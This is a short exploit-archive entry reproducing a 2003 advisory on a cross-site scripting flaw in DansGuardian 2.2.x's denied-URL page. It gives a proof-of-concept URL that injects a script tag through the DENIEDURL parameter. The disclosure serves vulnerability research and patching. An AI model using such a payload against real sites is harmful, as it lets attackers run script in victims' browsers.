DansGuardian 2.2.x - Denied URL Cross-Site Scripting
| EKU-ID: 28730 | CVE: CVE-2003-1506;OSVDB-2748 | OSVDB-ID: |
| Author: Richard Maudsley | Published: 2003-10-22 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28730 | CVE: CVE-2003-1506;OSVDB-2748 | OSVDB-ID: |
| Author: Richard Maudsley | Published: 2003-10-22 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/8876/info
A problem has been reported in the handling of some types of input to DansGuardian. This problem may permit an attacker to launch cross-site scripting attacks.
http://www.example.com/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Test');window.open+("http://www.example.com")</script>